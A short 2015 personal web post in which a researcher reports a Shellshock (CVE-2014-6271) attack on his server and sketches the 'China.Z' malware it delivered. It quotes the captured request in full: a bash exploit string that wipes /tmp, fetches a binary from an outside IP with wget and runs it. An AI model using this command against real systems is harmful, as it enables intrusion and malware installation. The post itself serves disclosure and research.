Tuplanolla Sampsa Kiiskinen

2015

This might not be relevant for a long time.

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying the request into an archive. Alas the university does not allow sharing the archive even for research purposes.